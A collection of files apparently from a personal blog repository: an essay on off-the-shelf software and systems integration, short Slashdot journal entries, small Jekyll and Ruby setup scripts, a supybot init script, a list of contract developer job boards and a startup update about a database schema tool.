Some organisations will always think they are too special or have too much ego invested in rolling their own (not-invented-here syndrome) to buy an off the shelf options. This is inefficient, but will happen nonetheless if they want to pay for it.
There will always be innovation and disruption, which will require engineering effort. Even in the age-old physical realm of engineering such as building roads, bridges and buildings there continues to be innovation and a need for skilled highway and bridge engineers.
Undeniably, however, there are whole classes of problems that software is capable of solving that have already been solved (some better than others of course), and a market of off the shelf or open source software dominates each particular problem leaving little room for expensive one-off custom builds to solve the same problem again.
As each vendor gets better at solving the problem at hand (or gets disrupted when they fail to), more and more use cases that used to require custom code are served by off-the-shelf software eliminating the need for developer time and replacing it with more-or-less need for installation, setup and configuration expertise.
## The end-game for software development
In the very long run (maybe another 100 years?) I see us getting to a steady state much like exists in traditional physical engineering. There are no vast new uncharted problem spaces waiting to return billions of dollars just for being first to get there. There will still be the occasional disruption but we'll look back on the dot-com boom in the late '90s just like we look back on the industrial revolution and the creation of railroads for the first time. We'll still have railroads, and we'll still have social media platforms and SaaS businesses; and sometimes one company will die and be replaced by others; but we won't be awestruck by silicon valley's ability to turn the world on its head any more. It will just be normal.
As for the software developers and their trade; they won't go extinct, they'll probably have the same job titles more or less. There will be more developers working for the SaaS companies, infrastructure companies and boxed software companies (locally installed software will never die), and less developers working for businesses that aren't fundamentally software businesses. The latter will just buy the outputs of the software companies for far less than they would have had to pay a development team or outsourcer.
## Developer salaries
Companies that have money will always pay good money for good people, and software businesses serving worldwide business and consumer markets with software that costs nothing to replicate will always have plenty of money.
The "shortage" of software developers caused by the collapse in interest in computer science degrees after the dot-com bust combined with ever increasing production of software has already started to be mitigated as the "boot camp" model that has been running for a few years now at scale is starting to result in volumes of quality and sufficiently experienced engineers. This will push prices for the "average" developer down. In fact prices of the average developer haven't really moved much in the last 20 years in spite of the effects of inflation eating away at the real value of that income. £50-60k is still a reasonable salary for an experienced engineer in an average job in the UK just like it has been for years, while house prices have rocketed up in that time.
So in the long run apart from people that can make themselves invaluable to the richest companies (which takes more than being able to write Python or C#) will still be well rewarded, but the days of exceptional salaries for anyone that can write a `for` loop let alone recursion are well behind us now.
## The fractures and integrations between software
An interesting effect of the ever-growing amount of coverage of off-the-shelf software and SaaS companies in the global problem-space of business is the rising challenges and expectations for making it all work together (often known as "systems integration").
For sectors where there are many similar businesses (think plumbers, accountants, travel agents), the software vendors will produce solutions that cover everything that the profession needs all in one offering (marketing, finance tracking, invoicing, customer contact etc.). They can do this cost-effectively by selling the same thing repeatedly for near-zero marginal cost.
Bigger more complicated businesses, or more unique businesses are left trying to avoid building everything they need from scratch and instead trying to cobble together a complete solution for their business from all the various SaaS and on-site offerings that are out there.
As businesses put solutions in place for each problem they have to solve, they then start looking at how well these things are working together, and mostly discover that they aren't. One SaaS thinks it has the answer to everything but is wrong, another on-site system thinks it owns the data about customers but the cloud-based CRM has got out of sync again and they keep upsetting customers by getting their facts wrong. So sometimes they just paper over the cracks with people based processes and spreadsheets. Sometimes they hire developers to try and glue systems together that really don't want to be glued together (through the magic of dubious quality APIs or maybe direct SQL database access).
Some bits of software provide value as a standalone thing (e.g. document or chat tools), but even with those there's a drive to integrate (e.g. single sign-on to avoid access for previous employees, auditing and storage for compliance etc). Other bits of software are very painful to leave disconnected (e.g. a storefront in Magento where customers purchase goods and an inventory ordering/management (ERP) system in SAP Business One that makes sure there's anything to ship).
To solve this latest self-inflicted pain of the software world a whole new class of software has emerged whose only job is to join systems together that don't know how to connect directly, or to act as an orchestrator of all the flows of data. You might have seen IFTTT (If This Then That) which is the consumer-centric version of this where you can make any number of events in one SaaS trigger actions elsewhere. Another is Business Process Automation (BPA) such as Codeless BPA which connects all sorts of enterprise software together by hook or by crook, while giving a central place to manage the flow of data and massage and monitor it on the way through as needed.
But even *that* extra layer of connection still doesn't always give us the magical point and click connection we were promised decades ago where you can make your whole business work without talking to any nerds. For simpler cases you might get lucky, but as soon as you have to make a web hook work many people just glaze over and reach for the phone. And if something stops working between two bits of software that don't really like each other, and your business's whole income depends on that data flow, you're going to do whatever it takes to make it behave again. So in a slightly different shape we find ourselves yet again in need of a vast army of technical folks who really know what's going on and how to work the magic to make the wheels turn again and the ones and zeros flow like a spring down a mountain-side.
## Service buses and event sourcing
One of my tech friends mentioned this (very technical) approach to solving the pains. This is a really good point, as you can get better, more scalable, more fault-tolerant and more responsive systems with these approaches. The move to this approach is however contingent on either the vendors playing ball, or on your systems being sufficiently hand-coded already that you can make these kinds of architectural improvements. YMMV as they say. An interesting aside that's worth being aware of and considering. I won't go into what they are here as there's tons of content out there on this.
## AI (Artificial Intelligence) and Machine Learning (ML)
A hot topic of the day is AI and ML. These are growth areas for good reason as they can eliminate whole swathes of formerly labour intensive work, but personally I don't see programming in any meaningful sense as being one of them. I might be a bit biased of course. If anything this is likely to spawn yet more need for highly capable technical folks to build and integrate these new systems, regardless of where the boundaries of each system sit.
## A new consultancy
Yes there was a reason I was even thinking about this, let alone writing it down, but this isn't really a pitch; I genuinely find this stuff interesting to think and write about.
I'm building a new systems integration business off the back of my experience in tech, so if that's relevant to you drop me an email <mailto:<EMAIL>> and let's talk. I'm looking to build my network of people who I/we can help, and also my network of people who might want to be involved in the new business.
## A penny for your thoughts
I'd love to talk to you *on an actual phone call* if you thought this was interesting or relevant (or wrong or silly!)
Drop me a line on <mailto:<EMAIL>> and arrange a call!
## Footnotes
### Many names of non-custom software
Sometimes you may hear software referred to as COTS, which is short for "Commercial Off The Shelf" software, or "boxed software". These days you might call that codeless, no-code or low-code. Or maybe "apps". The point here is that you don't have to pay developers to solve a problem (which is expensive, slow and error prone - good for developers paid for their time and skills, not so good for the business paying the bill).
<file_sep>---
title: "comedy email circular"
date: 2006-05-25
slashdot_url: https://slashdot.org/journal/136226/comedy-email-circular
---
<p>Thanks to our head of sales for this one:</p>
<p>=========================================</p>
<p>The Department of Transport has now devised a new scheme in order to identify poor drivers and give good drivers the opportunity to recognise them whilst driving.</p>
<p>For this reason as from the middle of May 2006 those drivers who are<br>found to be driving badly which includes:</p>
<p>
-overtaking in dangerous places;</p>
<p>
-hovering within one inch of the car in front;</p>
<p>
-stopping sharply;</p>
<p>
-speeding in residential areas;</p>
<p>
-pulling out without indication;</p>
<p>
-performing U turns inappropriately in busy high streets;</p>
<p>
-under taking on motorways and</p>
<p>
-taking up more than one lane in multi lane roads,</p>
<p>
These drivers will be issued with flags, white with a red cross,<br>signifying their inability to drive properly. These flags must be<br>clipped to a door of the car and be visible to all other drivers and<br>pedestrians.</p>
<p>Those drivers who have shown particularly poor driving skills will have<br>to display a flag on each side of the car to indicate their greater lack<br>of skill and general lower intelligence mindset to the general public.</p>
<p>Please circulate this to as many other motorists as you can so that<br>drivers and pedestrians will be aware of the meaning of these flags.</p>
<p>
Department of Transport.</p>
<p><NAME> - Engineer<br>SCC Highway Safety and Improvement<br>Integrated Transport (East)</p>
<file_sep>#!/bin/sh -v
# https://asdf-vm.com/#/core-manage-asdf-vm
git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.7.8
sudo apt-get install libssl-dev libreadline-dev zlib1g-dev
asdf plugin add ruby
asdf install
# show versions in use
asdf current
bundle install
<file_sep>---
title: "Now I'm annoyed"
date: 2004-09-14
slashdot_url: https://slashdot.org/journal/83729/now-im-annoyed
---
<p>Once again I've been threatened by the BBC.<br>Edited image of the <a href="http://www.timwise.co.uk/images/threat_sm_ed.jpg">most recent letter</a> [48Kb]</p>
<p>I've reeled off a letter to white dot to see if they can help, or know of people who are similarly irritated.</p>
<p>See also:<br><a href="http://www.whitedot.org/">http://www.whitedot.org/</a><br><a href="http://www.tvlicensing.co.uk/">http://www.tvlicensing.co.uk/</a> -Resizes your browser! Very bad web design.</p>
<p>Letter follows:<br>===============================================<br>To: info/at/whitedot/dot/org<br>Subject: uk tv licensing</p>
<p>Hello folks.</p>
<p>I watched your telly program yonks ago (the one on the BBC saying, erm, don't watch the BBC!), and had to agree with more or less all your arguments. Bit disappointed you've not updated your site lately (last 12 months), maybe you got distracted by the flickering box in the corner?! I haven't had a TV in my flat for the last nine months now, and guess what. I don't miss it.</p>
<p>I've been getting threatening letters regularly from the BBC's TV Licensing division since about February, but this latest one has a tone which I find highly offensive as it implies that there can be no doubt I am a criminal. I've checked every letter to make sure there is no legal compulsion to tell them I have no TV, and there doesn't seem to be. I looked through the whole of the HTML on <a href="http://www.tvlicensing.co.uk/">http://www.tvlicensing.co.uk/</a> and found no reference to not having a TV.</p>
<p>I was hoping you might know what other people feel about being threatened this way, and what people have done about it.</p>
<p>I'd particularly like to draw your attention to the small print at the bottom of the page which says "If you have recently purchased a license, please accept our apologies...", and the notable absence of any such apology to those of us who dislike television far too much to pay £121 for it.</p>
<p>To be fair, there is actually a reasonable reference to people who do not own a TV on page 12 of this:<br><a href="http://www.tvlicensing.co.uk/pdfs/40115_BBC_Freedom_of_Info.pdf">http://www.tvlicensing.co.uk/pdfs/40115_BBC_Freedom_of_Info.pdf</a><br>though it's taken me half an hour to find it and it doesn't detract from the fact that I've just been threatened with court action (again) and the £1,000 fine that they go on about.</p>
<p>Latest letter attached.</p>
<p>Yours</p>
<p><NAME><br>Berkshire,<br>UK</p>
<file_sep>---
title: "google wos ere"
date: 2005-08-10
slashdot_url: https://slashdot.org/journal/114178/google-wos-ere
---
<p>Google has cached a visit to my header display page, which is cool (if you have a clue what planet I'm on)<br><a href="http://192.168.127.12/search?q=cache:rJkIzyKroCYJ:www.timwise.co.uk/userdetails.asp+site:timwise.co.uk&hl=en">http://192.168.127.12/search?q=cache:rJkIzyKroCYJ:www.timwise.co.uk/userdetails.asp+site:timwise.co.uk&hl=en</a></p>
<file_sep>---
title: "trackback"
date: 2005-10-11
slashdot_url: https://slashdot.org/journal/119447/trackback
---
<p>posted comment here:<br><a href="http://evilsoft.blogspot.com/2005/04/whats-in-box.html#comments">http://evilsoft.blogspot.com/2005/04/whats-in-box.html#comments</a></p>
<file_sep>---
title: "some things I'm happy about"
date: 2005-05-23
slashdot_url: https://slashdot.org/journal/107567/some-things-im-happy-about
---
<p>I cycled to work every day since Wednesday. That's 4 days now<nobr> </nobr>:) and 72 miles. Also have all the right clips for pump etc now.</p>
<p>Really getting stuck into new project at work, which is good.</p>
<p>Really getting stuck into Linux at home (mostly <a href="http://fedora.redhat.com/">fedora</a>). Currently trying to figure out what I've done wrong on my attempt at a samba share.</p>
<p>I'm also making quite a good attempt at keeping <a href="http://www.timwise.co.uk/synch/xbel.xml">my bookmarks</a> up to date, and adding new stuff. (link from <a href="http://www.timwise.co.uk/">timwise</a>)</p>
<p>If you had noticed (unlikely) that my stats pages and are down and that the full size photos are missing it's because the little old laptop I've been running them on got hacked and I haven't fixed it yet. That'll teach me for lapsing on updates! I'll probably post interesting details of what I find when I get around to analysing the machine.</p>
<p>x</p>
<p>Tim</p>
<file_sep>#!/bin/bash
# Usage:
# ./new "Some blob post title"
name="${1:-todo}" # default name
kebab_name=$(sed -e 's/ /-/g' -e 's/\(.*\)/\L\1/g' <<< "$name")
newfile=_posts/`date +"%Y-%m-%d"`-$kebab_name.md
sed "s/name_here/$name/" _drafts/template.md >> "$newfile"
echo "$newfile created"
vim "$newfile"
<file_sep>---
title: How to find contract developer clients
layout: post
categories: [contracting,resources]
---
## Handling recruiters
Before you dive in, you might want to look at my [page on dealing with
recruiters](/recruiters/), especially if you are going to be dealing with
multiple recruiters at once.
## Rate research with ITJobsWatch.co.uk
[IT JobsWatch](https://www.itjobswatch.co.uk/contracts/uk/developer.do) is a great guide to market prices. You can see numbers, graphs, trends, compare tech, and see what appears together.
It's also a useful source of ideas for considering what might be a good investment in saleable skills.
Note the volume as well as the price, for example C# is massively higher volume than Ruby.
## Lead sources
In rough order of the success I've had with them over the 7 years of contracting:
### JobServe
<https://www.jobserve.com/gb/en/Job-Search/>
By far the most reliable source of leads. Slightly shonky website, bit fiddly
to use but it seems that all the recruiters post their wares here.
Tactics:
* Upload a pdf cv
* Run a not particularly tight search (e.g. asp.net as a keyword with 50 mile radius, ordered by distance)
* Blindly send your cv to all of them without worrying too much or bothering to address the post.

This might sound lazy, but in my experience I almost never hear back about the
advertised role, but what this does do is let recruiters that specialize in
your particular skills know you are actively looking, which is a lot easier for
them to make use of than hoping to tempt someone who isn't.
### Workable
<https://jobs.workable.com/>
### LinkedIn
By posting regularly the progress of my search and asking contacts for help I
have had some luck getting referrals. I've never used LinkedIn's proper job
posting system but it's probably worth checking out.
It's worth being careful if you are looking before leaving. I tend to not look
till I've finished the previous contract and had some time to refresh so that
hasn't been an issue for me.
#### LinkedIn job hunt status
You can now set your "open to work" status to everyone, recruiters etc so be
sure to set that. I've definitely had inbound interest from that, albeit
relatively low quality. It also adds an overlay to your profile image which your
network might see when you post things.
#### LinkedIn Hiring groups
* [Outside IR35 contracts board](https://www.linkedin.com/groups/9031918/) group. - I can do invites if you want them. Let me know.
### Recruiters
It's probably worth reaching out to recruiters directly.
They cold email us so no reason not to go the other way when you need a job.
Could work out for everyone.
Here's a useful list that you could use as a source of leads as well as a way
of filtering all the inbound email into a folder
<https://github.com/alexmbird/uk-it-recruiter-domains/blob/master/domains.txt>
### People you know (your "network")
Possibly with the assistance of LinkedIn, WhatsApp, Telegram, Signal, Facebork etc.
I don't like to mention this as the idea of "networking" always made me cringe,
but the truth is who you know matters and can get you an "in" where you might
not have before, and indeed in the past I've won contracts through friends of
friends and repeat business.
It doesn't seem very actionable, and when you need it it's probably too late to
build a "network" of trust, but you can still reach out to the people you do
know with a friendly message and make it clear you're looking (and be clear
about what you're looking for - to trigger what [<NAME> calls "Rolodex
Moments"](https://jonathanstark.com/daily/20170127-dogfooding---rolodex-moments))
This is also a reminder to leave a trail of positive experiences with everyone you meet, go the extra mile, and invest a little regularly in your relationships whether you "need" them in the moment or not.
### Others
These are ones I've come across that you might want to cover if you are looking
to not miss anything, but I haven't either used or succeeded with these myself.
Suggestions for additions to this list welcome, just drop me an email or [raise
a PR](https://github.com/timabell/timwise.co.uk/edit/master/_posts/2019-06-26-how-to-find-contract-dev-jobs.md).
* <https://gun.io/find-work/>
* <https://news.ycombinator.com/submitted?id=whoishiring>
* <https://outsideir35roles.com/contract-listings/>
* <https://remoteok.io/>
* <https://snap.hr/>
* <https://uk.indeed.com>
* <https://wellpaid.io/>
* <https://www.amazon.jobs/>
* <https://www.contractoruk.com/it_contract_jobs>
* <https://www.contractspy.co.uk/>
* <https://www.cv-library.co.uk>
* <https://www.cwjobs.co.uk>
* <https://www.icontract.co.uk/>
* <https://www.itcontractjobs.co.uk>
* <https://www.itjobboard.net>
* <https://www.jobserve.com>
* <https://www.jobsite.co.uk>
* <https://www.linkedin.com/jobs>
* <https://www.monster.co.uk>
* <https://www.reed.co.uk>
* <https://www.technojobs.co.uk>
* <https://www.upwork.com/> - seems to be low paid commodity labour on an
international market largely, however I think some people have managed to
break through this and become in demand. At that point you're basically an
entrepreneur.
* <https://www.quora.com/What-should-I-do-to-increase-my-earnings-on-Upwork-when-I-have-been-registered-on-it-for-over-a-year-and-have-done-only-one-10-job-for-which-I-received-a-five-star-rating>
* <https://www.yunojuno.com/>
#### Deceased sites
* ~~<https://jobs.github.com/>~~ - [github jobs decommissioned](https://github.blog/changelog/2021-04-19-deprecation-notice-github-jobs-site/)
* Sadly [stackoverflow jobs has been decommissioned](https://meta.stackoverflow.com/questions/415293/sunsetting-jobs-developer-story). ~~<https://stackoverflow.com/jobs?j=contract>~~
### Places to find even more
* <https://www.quora.com/What-are-the-best-job-boards-for-software-engineers>
## Practical tips
- Track everything you've applied to (Trello, or HubSpot if you're feeling rich).
- Keep a copy of the full advert description and rate, they are often taken down before you speak to anyone which weakens your negotiation position.
- Follow up with phone calls after applying - makes you more real, makes it easier for them.
- Track all the businesses in your sector and technology, and their hiring managers and contact them before letting recruiters get in the middle.
- See also my [recruiters page](/recruiters) for defense against the dark arts. Or you could just blanket declare "no recruiters".
## About this post
Someone I know is looking for work (hello!) so rather than just emailing I
thought I'd make a more permanent list of all the places I've come across for
finding work as a contract developer.
For context, I'm a backend developer, specialising in Microsoft ASP.NET / C# &
SQL Server databases, with a smattering of other things (t-shaped people as
they say).
<file_sep>---
layout: post
title: Announcing the Communication Book project
date: '2012-03-21T21:04:00.004Z'
author: <NAME>
tags:
- communication-book
- oss
- java
modified_time: '2012-03-21T21:12:59.474Z'
thumbnail: http://2.bp.blogspot.com/-pMoDVHCIh24/T2pDE3IeGxI/AAAAAAAAAEM/dKiGFEIYC4U/s72-c/screenshot_v0.3-r34.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3479941793818984960
blogger_orig_url: https://timwise.blogspot.com/2012/03/announcing-communication-book-project.html
---

I've been working on a piece of open source software to assist people who have
[aphasia](https://en.wikipedia.org/wiki/Aphasia) (speech difficulties), and it
is now sufficiently functional to be worth mentioning. It's still very rough
around the edges, but if you are on a debian based system you should be able to
easily get it up and running and see what you think. If you are on other
platforms you'll currently need a bit (alright, a lot) of java knowledge to get
this up and running.
If you have the time to help I'd be very grateful. You don't have to be a
coder, just letting me know if it works for you would be great.
If you want to know more or would like to give it a try then please do head
over to the project page at
[http://launchpad.net/communication](http://launchpad.net/communication).
<file_sep>---
layout: post
title: getting supybot to announce new bugzilla bugs
date: '2009-11-16T17:22:00.005Z'
author: <NAME>
tags:
- irc
- howto
- ubuntu
- linux
- bugzilla
- script
- oss
- sys admin
modified_time: '2009-11-17T10:23:25.092Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8826812947380288670
blogger_orig_url: https://timwise.blogspot.com/2009/11/getting-supybot-to-announce-new.html
---
getting supybot to announce new bugzilla bugs - I've just put here the key non-obvious things that tripped me up when trying to set this up.
All done on Ubuntu 8.04.3 LTS
Install [supybot](http://sourceforge.net/projects/supybot/) and the [supybot bugzilla plugin](http://code.google.com/p/supybot-bugzilla/).
Create a system group (supybot) and user (bugbot) to run supybot as.
Set up your supybot configuration file as desired.
Getting supybot to start at startup:
[http://www.schwer.us/journal/2005/04/17/supybot-init-script-for-debian/](http://www.schwer.us/journal/2005/04/17/supybot-init-script-for-debian/)
Here's my modified init script
```
$ cat /etc/init.d/bugbot
#! /bin/sh
#
# supybot init script
# http://www.schwer.us/journal/2005/04/17/supybot-init-script-for-debian/
#
PATH=/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/usr/bin/supybot
NAME=supybot
DESC=supybot
test -f $DAEMON || exit 0
set -e
case "$1" in
start)
echo -n "Starting $DESC: "
start-stop-daemon --start --quiet \
--chuid bugbot --exec $DAEMON -- --daemon /etc/supybot/bugbot.conf
echo "$NAME."
;;
stop)
echo -n "Stopping $DESC: "
start-stop-daemon --stop --quiet \
--oknodo --exec /usr/bin/python
echo "$NAME."
;;
restart)
$0 stop
$0 start
;;
*)
echo "Usage: $0 {start|stop|restart}" >&2
exit 1
;;
esac
exit 0
```
Set up bugzilla to send a copy of all bugmail to a local address (eg bugbot@localhost), and configure exim4 to accept local mail (as well as smart host delivery), using the mbox format.
sudo dpkg-reconfigure exim4-config
Start a conversation with bugbot, get it to identify you, then set the required configuration by sending it messages (you can also set these in the supybot .conf file for your bot):
config plugins.Bugzilla.mbox /var/mail/bugbot
and
config plugins.Bugzilla.bugzillas.your-bugzilla-name.watchedItems.all True
which will turn on the announcements (i had to read the code to find that one!)
Note that supybot doesn't immediately write config changes to disc.
<file_sep>---
title: "Weekend"
date: 2004-11-08
slashdot_url: https://slashdot.org/journal/89748/weekend
---
<p>Went to Cambridge and relaxed.<br>Was great.</p>
<p><a href="http://www.timwise.co.uk/images/4A5E0007.jpg">photo</a> at top of church tower. (Taken with my new toy<nobr> </nobr>:)</p>
<file_sep>---
title: "bad websites"
date: 2006-03-11
slashdot_url: https://slashdot.org/journal/131064/bad-websites
---
<p>I didn't think this kind of thing still existed, let alone on a commercial site:<br><a href="https://www.mytravelmoney.com/SiteBrowser.htm">https://www.mytravelmoney.com/SiteBrowser.htm</a></p>
<p>So I sent them a rant<nobr> </nobr>:)</p>
<p>---------------<br>To: <EMAIL>; <EMAIL></p>
<p><a href="http://www.goingplaces.co.uk/AniteNextPage.asp?p=HOLIDAYEXTRASHOME&s=162000990">http://www.goingplaces.co.uk/AniteNextPage.asp?p=HOLIDAYEXTRASHOME&s=162000990</a><br><a href="https://www.mytravelmoney.com/SiteBrowser.htm">https://www.mytravelmoney.com/SiteBrowser.htm</a></p>
<p>From your site:</p>
<p>
"The view this site you must use Internet Explorer 5.0 or later.</p>
<p>
You may download the latest version of Internet Explorer from the following URL:</p>
<p>
<a href="http://www.microsoft.com/windows/ie/downloads">http://www.microsoft.com/windows/ie/downloads</a>"</p>
<p>This is unacceptable.</p>
<p>Haven't you heard of Firefox, Opera, Netscape, Mozilla, Lynx, Safari? Or Linux? Or Macs? Or the W3C and the drive for standards? This kind of message makes your site look like it's stuck in the 80's. If you cannot design a site for more than one browser then you shouldn't be designing websites.<br>In case you hadn't guessed, I won't now be buying currency from you.</p>
<file_sep>---
title: "Mr C"
date: 2004-09-21
slashdot_url: https://slashdot.org/journal/84451/mr-c
---
<p>Just had word, James is back in Dorking, and is broke!</p>
<p>Mail him. (hyperjames 2003)</p>
<p>Hello James.</p>
<file_sep>---
title: "bicycles"
date: 2006-03-10
slashdot_url: https://slashdot.org/journal/130984/bicycles
---
<p>BBC News on new highway code:<br><a href="http://news.bbc.co.uk/1/hi/magazine/4789146.stm">http://news.bbc.co.uk/1/hi/magazine/4789146.stm</a></p>
<p>Bad cycle lanes:<br><a href="http://www.warringtoncyclecampaign.co.uk/facility-of-the-month/">http://www.warringtoncyclecampaign.co.uk/facility-of-the-month/</a></p>
<p>Sunglasses mounted mirror:<br><a href="http://icebike.org/Equipment/cyclingmirrors.htm">http://icebike.org/Equipment/cyclingmirrors.htm</a> - skip down to "Take A Look:"</p>
<p>My new favourite bike shop: CycleZone (no real website)<br><a href="http://www.touchreading.com/business/list/bid/3605783">http://www.touchreading.com/business/list/bid/3605783</a></p>
<file_sep>---
title: "Windsurfing"
date: 2004-06-16
slashdot_url: https://slashdot.org/journal/74626/windsurfing
---
<p>Excellent evening out on the lake today.</p>
<p>It's been ages since I was out last on a board, and I was rubbish then! But with a little help from my friends, and a fair breeze I don't think I did too badly.</p>
<p>I don't half ache now.</p>
<p>Cheers for dinner A, much appreciated.</p>
<file_sep>---
layout: post
title: Using Pidgin for IRC
date: '2010-12-15T10:35:00.003Z'
author: <NAME>
tags:
- irc
- open source
- pidgin
modified_time: '2010-12-15T10:39:50.788Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-589107923468491077
blogger_orig_url: https://timwise.blogspot.com/2010/12/using-pidgin-for-irc.html
---
[pidgin](http://pidgin.im/ "http://pidgin.im/") is quite a good irc client.
Once you have downloaded and installed pidgin:
* Accounts > Manage Accounts
* Add...
* Protocol: IRC
* Username: your preferred nickname (please use your real name)
* Server: your irc server, eg irc.freenode.org
* Password - leave blank
* Add
* Close (the "Accounts" window)
Back in the main pidgin window:
* Buddies > Join A Chat...
* Account: the one you just created
* Channel: #favouriteroom, eg #pidgin
* Password - leave blank
* Join
In the new chat window for the chatroom:
* Conversation > Add...
* Tick "Autojoin when account connects."
* Tick "Remain in chat after window is closed."
* Leave everything else as defaults
* Add
Now when pidgin launches you will have "#favouriteroom" in your buddy list, and you can double click to open the chatroom.
You may also want to make pidgin start when windows starts;
From the main window:
* Tools > Plugins
* Tick "Windows Pidgin Options"
* Configure Plugin
* Tick "Start Pidgin on Windows startup"
* Close
* Close (plugin window)
I also recommend enabling the Markerline plugin to help see what is new in the channel.
<file_sep>#!/bin/sh -v
(sleep 3 && xdg-open http://localhost:4000/) &
bundle exec jekyll s --drafts $@
<file_sep>---
title: "Dodgy DELL drivers"
date: 2004-03-17
slashdot_url: https://slashdot.org/journal/65483/dodgy-dell-drivers
---
<p>Came home to find laptop with its fan on full and running at 100% cpu usage. Not good.<br>Culprit process was pctspk.<br>Found that it is related to modem drivers <a href="http://www.liutilities.com/products/wintaskspro/processlibrary/pctspk/">here</a>, and discovered this problem is <a href="http://support.packardbell.dk/pri/index.php?PibItemNr=topic_01895">known</a> to packard bell (shudder).</p>
<p>So I've dropped a support query to DELL. Wait and see time.</p>
<file_sep>---
title: "Morzine"
date: 2004-08-22
slashdot_url: https://slashdot.org/journal/81130/morzine
---
<p>All of the <a href="http://www.t.abell.dsl.pipex.com/photos/morzine_aug04/">Morzine photos</a> are up. [7.83Mb]</p>
<p>Had a top time.</p>
<file_sep>---
title: "swimming"
date: 2004-02-13
slashdot_url: https://slashdot.org/journal/61917/swimming
---
<p>Looks like i'm turning into a fitness phreak. Since I started I have been swimming: Mon eve, Tue am, Wed eve, Thur am, Mon eve, Tue am, Wed eve, Mon eve, Wed eve, Thur am and this evening (Fri).<br>Now I'm knackered. Should be a 'large' weekend though<nobr> </nobr>;)</p>
<file_sep>---
title: "stats"
date: 2004-09-11
slashdot_url: https://slashdot.org/journal/83418/stats
---
<p>Woo!<br>Mandrake, Apache, AWStats, wget, cron, sleepless nights...<br><nobr> </nobr>... and now I have up to date stats for <a href="http://www.timwise.co.uk/">timwise.co.uk</a>, updated automatically overnight every night for the previous day's usage. Including the cubs site.<br>See the stats link bottom right of the home page.</p>
<p>Joy.</p>
<p>Also, I've started signing into ICQ again, and there's a little image on timwise that tells you if I'm online, which is nice. I'm not too keen on the standard icq client any more, but that's ok because I use <a href="http://gaim.sourceforge.net/">GAIM</a> these days, which I can highly recommend. If you can't be bothered with that, you can click on the online img on my site and send me a message through the icq messaging centre, which is quite a cool feature.</p>
<file_sep>---
layout: post
title: Down with SDV! long live SSE!
date: 2017-12-29 02:59:54.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/12/29/down-with-sdv-long-live-sse/"
---
I can't keep up with myself on this startup journey, but I hope I can give you a peek into my journey as I go. I've had couple of revelations recently which I'll explain here:
## Discovering your needs
I've managed to talk to more people about what problems I could solve and have started to learn more about what value this tool might provide (solution-to-problem instead of the usual solution-looking-for-problem).
I had originally thought of this tool as something for viewing data, but I've had several people express an interest in the ability to visualize relationships. This was surprising to me as personally I've been using [SqlHawk](http://timabell.github.io/sqlHawk/) (my fork of [SchemaSpy](http://schemaspy.org/)) to get to grips with database relationships, but I hadn't considered that they don't get widespread use in the circles I move in; presumably due to a mix of awareness and what a pain they are to set up (Java, shudder).
Having explained my vision for the tool to my friend and ex-colleague Ben, I managed to ask him to say in his own words how he might hypothetically describe it to others, and he uttered the magical words: "well it's kind of a schema explorer". And suddenly I understood that the real value of the tool I'm creating is not in the ability to poke around the data per-se, it's actually the ability to come to an unfamiliar relational database and be able to much more quickly understand how it hangs together. (It'll have value in familiar databases too, but I like this focus, it feels higher-value.)
As a result "diagrams" is now the top-priority feature being added to SDV.
It also gives me a new name for Sql Data Viewer...
<div class="flickr-pic">
<a data-flickr-embed="true" href="https://www.flickr.com/photos/tim_abell/24405997637/" title="IMG_20171219_160643"><img src="https://live.staticflickr.com/4731/24405997637_bda2d45a93.jpg" width="500" height="276" alt="IMG_20171219_160643"></a>
</div>
## New name, new domain
The product has been renamed to **Sql Schema Explorer**, which can now be found on the shiny new domain [schemaexplorer.io](http://schemaexplorer.io)
For the new website:
* I've given up on all the [fancy wordpress designs and hosting](http://blog.timwise.co.uk/2017/10/22/choosing-wordpress-hosting-for-a-new-idea/) I was using for the old domain and have gone for [github pages](https://pages.github.com/).
* All the bloated css and javascript is gone, leaving nothing but a [hand-crafted flat html](https://github.com/timabell/sdv-website/blob/master/index.html) file that should load beautifully on any connection thanks to being under 1kb of content in total with no trackers or external resources.
* It should reliably render on most devices with minimal CPU load or delay thanks to the lack of bloated and fragile javascript / device detection etc.
* I've ditched the fancy drip sign-up form in favour of a simple email link (why solve the volume problem when I don't have it yet?).
* I've ditched the google analytics tracker because it's a vanity metric if it's not money in the bank; and these trackers have hidden costs (page load time, leaking your customer's data to google etc). If I get a sudden influx I can just ask them how they found me rather than reading between the digital lines.
* I've stripped the content back to almost the bare minimum to try and drive focus towards email signups so that I can then engage in-depth through that. I need enough that I can point people at it in conversation to get them signed up. I only need a dozen early customers to help me shape the product so I don't need to optimize for complete strangers who've never heard of me yet.
* I've created my own personal style of design that favours minimalistic css and markup to keep page load fast and complexity down whilst still giving structure to the message and a little bit of easiness on the eye (e.g. off-white/black, read the css if you like). I'll be continuing to [improve my design skills](https://designacademy.io/) as I work on this project, though I'm not against outsourcing when I need to.
## Money, money, money
You may remember I wrote about [making SDV free](http://blog.timwise.co.uk/2017/11/17/why-sdv-could-be-a-billion-dollar-business/) not too long ago. With the above new understanding about the value that the product can provide and what it will take to build a full-featured product for that market I am no longer concerned about being immediately copied, and think it has sufficient value to be a viable product in its own right. As such I will be charging for it after all.
I'll be following the great advice from the episode of [Startup Chat - 268: Encore Episode – How to Get Your First 10 Customers](https://thestartupchat.com/ep268/) that I heard recently (highly recommend this if you're also thinking of getting a startup / side-project off the ground).
The starting price point will be £150 per single user/machine. This is based on the "3x the first number you think of" formula because I think they are right that first instinct is off; after-all I have to make this a viable business otherwise development will stop and no-one wins.
I'll be offering the recommended money-back guarantee for my first customers; that way I can prove that there is real value in what I'm creating whilst maintaining my high ethical standards for fairness in business.
## Still here?
Great! Thanks so much for reading this. If you're interested in keeping up to date or being involved in the early life of this new product then head over to [schemaexplorer.io](http://schemaexplorer.io) and sign up!
<file_sep>---
title: "sooooo long"
date: 2003-12-03
slashdot_url: https://slashdot.org/journal/53994/sooooo-long
---
<p>Twenty Eight Days till they're out of my life.</p>
<p>>:(</p>
<p><a href="http://dictionary.reference.com/search?r=2&q=treachery">Treachery</a></p>
<file_sep>---
